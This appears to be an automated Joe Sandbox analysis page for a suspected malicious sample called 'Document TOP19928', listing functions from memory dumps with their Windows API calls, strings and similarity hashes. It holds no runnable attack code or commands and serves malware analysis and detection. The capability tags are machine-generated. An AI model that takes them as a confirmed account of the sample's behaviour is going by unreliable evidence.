ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00846576

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 4705e2c3dcf7bca501ff931cd46c8ec9ac00d6847f8f18ff48a2676d22cb3089
Instruction ID: 2826ad14211c38b1391c62e10d28c91596e907778be7c6a71f074682e12f7991
Opcode Fuzzy Hash: 4705e2c3dcf7bca501ff931cd46c8ec9ac00d6847f8f18ff48a2676d22cb3089
Instruction Fuzzy Hash: 1131903160021CABDF10AF24CC85BBE7BBCFB45715F008069FA09E7291EB74AD14CA62

Function 0085783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008578A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008578AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008578B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008578C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008578D4

Strings

Msctls_Progress32, xrefs: 00857872

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3f69a4b8a3cf87271d54487cbf891010b282f34a212ea83279929323d84f444f
Instruction ID: 45101f7fbb241abbfe355dba3d25885aed4fb7d21388b32d810064eb44194079
Opcode Fuzzy Hash: 3f69a4b8a3cf87271d54487cbf891010b282f34a212ea83279929323d84f444f
Instruction Fuzzy Hash: 0A118EB2110219BFEF159E60CC85EE77F6DFF087A8F018125FA04A2090C772AC21DBA4

Function 007F41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 007F41E3
GetProcAddress.KERNEL32(00000000), ref: 007F41EA
RtlEncodePointer.NTDLL(00000000), ref: 007F41F6
RtlDecodePointer.NTDLL(00000001), ref: 007F4213

Strings

RoInitialize, xrefs: 007F41D2
combase.dll, xrefs: 007F41DE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 176c5ceeea0027eb1e33429407fa69cb845fe474746ca4f313a700c1c2881055
Instruction ID: 48fbe4027867ee6dc0ae1348cd4b0a2c1d8300a03dfd1e1508af8658a7b51173
Opcode Fuzzy Hash: 176c5ceeea0027eb1e33429407fa69cb845fe474746ca4f313a700c1c2881055
Instruction Fuzzy Hash: D4E01AB0690704AFEB207BB0EC0DF553AA5B720743F545435B622D56E1DBBE40968F00

Function 007F429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007F41B8), ref: 007F42B8
GetProcAddress.KERNEL32(00000000), ref: 007F42BF
RtlEncodePointer.NTDLL(00000000), ref: 007F42CA
RtlDecodePointer.NTDLL(007F41B8), ref: 007F42E5

Strings

RoUninitialize, xrefs: 007F42A7
combase.dll, xrefs: 007F42B3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 1922f7f1c43704f4e095c54ceed3341dab7162df33a86553ae279ea9ce389bbf
Instruction ID: 66f2d62c32a2b606602c5ab421bf13062bafe81af6070ac15c2e2832dbd688f1
Opcode Fuzzy Hash: 1922f7f1c43704f4e095c54ceed3341dab7162df33a86553ae279ea9ce389bbf
Instruction Fuzzy Hash: 5CE0B678581704ABEB10AB60EC0DF563AA4B724787F14502AF215E22B1CBBC4545CA18

Function 00846E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WS2_32(00000000,?), ref: 00846F14
WSAGetLastError.WS2_32(00000000), ref: 00846F48
htons.WS2_32(?), ref: 00846FFE
inet_ntoa.WS2_32(?), ref: 00846FBB

Part of subcall function 0082AE14: _strlen.LIBCMT ref: 0082AE1E
Part of subcall function 0082AE14: _memmove.LIBCMT ref: 0082AE40

_strlen.LIBCMT ref: 00847058
_memmove.LIBCMT ref: 008470C1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: edacd568e9108bc938b873a4aee07814868fdb0c2e23c74c60ebd78f533704b6
Instruction ID: 3512ab449b59f8f8fbc5aed9f688bdb1cc9309ce953ea9db5486376a1f5c788d
Opcode Fuzzy Hash: edacd568e9108bc938b873a4aee07814868fdb0c2e23c74c60ebd78f533704b6
Instruction Fuzzy Hash: 8181CE71108704EBD710EB24CC89E6BB7F9FF84714F10491AF6559B292EB74AD04CB92

Function 0083675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008368AD
_memmove.LIBCMT ref: 008367E8

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

_memmove.LIBCMT ref: 0083685B
_memmove.LIBCMT ref: 00836942
_memmove.LIBCMT ref: 0083695B
_memmove.LIBCMT ref: 00836977

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 2d041445c1e7e0259c2479722ac09f3c27d41c41e1377ea4a5a1a6d857f3169a
Instruction ID: e5a6a71011a0b55850fbc2e938e24610fb6495570678fd8997374b816efe416a
Opcode Fuzzy Hash: 2d041445c1e7e0259c2479722ac09f3c27d41c41e1377ea4a5a1a6d857f3169a
Instruction Fuzzy Hash: 3A61A13050065AEBCF11EF24C885EFE37A8FF84308F44851AF9559B292EB38A951CB91

Function 0085046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 008510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00850588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008505AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008505D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00850617
RegCloseKey.ADVAPI32(00000000), ref: 00850624

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: a75b3a10d7980f3606a78dca18e7070a102fa355376c4603d90e3fa28eee37b4
Instruction ID: 60ef8ea021c2be7ca6a10bce9852fcb7337ae260dbd4f68b82f6a86387443efc
Opcode Fuzzy Hash: a75b3a10d7980f3606a78dca18e7070a102fa355376c4603d90e3fa28eee37b4
Instruction Fuzzy Hash: D7513931108304EFCB14EB24C889E6ABBF8FF84355F04491DF955972A2EB35E909CB52

Function 00855A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00855A82
GetMenuItemCount.USER32(00000000), ref: 00855AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00855AE1
GetMenuItemID.USER32(?,?), ref: 00855B50
GetSubMenu.USER32(?,?), ref: 00855B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00855BAF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 2cbbcf7ec8b6bc151cb43204d080854fcf8cdd41583f05a5ffd98987aba529b9
Instruction ID: e5b920086af8983eb4594e42ab940bc4b39f58fc79fdfc7621e3f15005e98375
Opcode Fuzzy Hash: 2cbbcf7ec8b6bc151cb43204d080854fcf8cdd41583f05a5ffd98987aba529b9
Instruction Fuzzy Hash: 9F517C31A00629EFCF11AFA4C859AAEBBB5FF48321F104469ED11F7351CB34AE458B91

Function 0082F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0082F3F7
VariantClear.OLEAUT32(00000013), ref: 0082F469
VariantClear.OLEAUT32(00000000), ref: 0082F4C4
_memmove.LIBCMT ref: 0082F4EE
VariantClear.OLEAUT32(?), ref: 0082F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0082F569

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: c8f8df3ee0d9e7fc3a00a6e93f7b2f159bec210d29711d0dab5268cb49d8a2b7
Instruction ID: 7275da43e2dd3bfd2f283560b234a6284196030b74edf019c280c4bf8e36da85
Opcode Fuzzy Hash: c8f8df3ee0d9e7fc3a00a6e93f7b2f159bec210d29711d0dab5268cb49d8a2b7
Instruction Fuzzy Hash: EC5168B5A00219EFCB10DF58D884AAAB7B8FF4C314B158169EA59DB301D734E951CFA0

Function 008326F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832792
IsMenu.USER32(00000000), ref: 008327B2
CreatePopupMenu.USER32 ref: 008327E6
GetMenuItemCount.USER32(000000FF), ref: 00832844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00832875

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
Instruction ID: 15bed7d9763266c8270290408fdc0260aa5094aa4c35c76e841483c1ce2d2643
Opcode Fuzzy Hash: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
Instruction Fuzzy Hash: DD519D70A0030AEFDF25CF68D888AAEBBF5FF84318F104169E921DB291D7749945CB91

Function 007D1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 007D179A
GetWindowRect.USER32(?,?), ref: 007D17FE
ScreenToClient.USER32(?,?), ref: 007D181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007D182C
EndPaint.USER32(?,?), ref: 007D1876

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 0a77b3b04af67f149a89ed25c7e76c04fbc755db977b55b2fdd38c23731f09f3
Instruction ID: ec1846a82c82997bad35cc80f3fa63f1d4aee5c80cac81e05200163cc98ea60d
Opcode Fuzzy Hash: 0a77b3b04af67f149a89ed25c7e76c04fbc755db977b55b2fdd38c23731f09f3
Instruction Fuzzy Hash: F6418C70204300AFDB11EF25CC84BBA7BF8FB49734F04066AFAA4872A2D7359845DB61

Function 0085B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(008967B0,00000000,00F0F148,?,?,008967B0,?,0085B862,?,?), ref: 0085B9CC
EnableWindow.USER32(00000000,00000000), ref: 0085B9F0
ShowWindow.USER32(008967B0,00000000,00F0F148,?,?,008967B0,?,0085B862,?,?), ref: 0085BA50
ShowWindow.USER32(00000000,00000004,?,0085B862,?,?), ref: 0085BA62
EnableWindow.USER32(00000000,00000001), ref: 0085BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0085BAA9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
Instruction ID: 46f4e5671ec5606c37ad11a97485296799b0b6307ef1d48c3a6e94f362bf06ba
Opcode Fuzzy Hash: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
Instruction Fuzzy Hash: AF414E30601251AFDB22CF18D489B957FE1FB15312F1842A9FE48CF2A2D731E849CB51

Function 008473B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00845134,?,?,00000000,00000001), ref: 008473BF

Part of subcall function 00843C94: GetWindowRect.USER32(?,?), ref: 00843CA7

GetDesktopWindow.USER32 ref: 008473E9
GetWindowRect.USER32(00000000), ref: 008473F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00847422

Part of subcall function 008354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0083555E

GetCursorPos.USER32(?), ref: 0084744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008474AC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: de27f505337af73e9cb1752b9546b6d2d0ce7377b4a63a0a1668d4bc1d1cd947
Instruction ID: 9460b56ed1a2ff486ebe600339b9464f7816f7005eaa76b3477ceb1d31b04dd3
Opcode Fuzzy Hash: de27f505337af73e9cb1752b9546b6d2d0ce7377b4a63a0a1668d4bc1d1cd947
Instruction Fuzzy Hash: EF31B272508309ABD720DF54D849EABBBE9FF88314F00091AF589D7192D734EA48CBD6

Function 0082E0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082E120
SysAllocString.OLEAUT32(00000000), ref: 0082E123
SysAllocString.OLEAUT32 ref: 0082E144
SysFreeString.OLEAUT32 ref: 0082E14D
SysAllocString.OLEAUT32(?), ref: 0082E175

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$Free
String ID:
API String ID: 1313759350-0
Opcode ID: ba36648a013a3e86f7f54fa0af0d83f92a2e21cab9c33c9b05742247aa32191e
Instruction ID: 01584652d70c7dd7ae72f79030b2bdca5aef58fb22f0f914b3cf0fa72684e10c
Opcode Fuzzy Hash: ba36648a013a3e86f7f54fa0af0d83f92a2e21cab9c33c9b05742247aa32191e
Instruction Fuzzy Hash: 5D216235604218BFDB109FA8DC88CAB77ECFB09761B108135FA55CB2A1DA74DC818B68

Function 0083ED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

_wcstok.LIBCMT ref: 0083EEFF
_wcscpy.LIBCMT ref: 0083EF8E
_memset.LIBCMT ref: 0083EFC1

Strings

X, xrefs: 0083EFFE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 2b81b352c64a70d4a60b74c64c95dbce1e8ac6190ed898ad8025fdc8f46cba23
Instruction ID: b5cf4609fadfc6f25fabd42c97df56a45afedae2dcb2f43ed5c46bb918a415a3
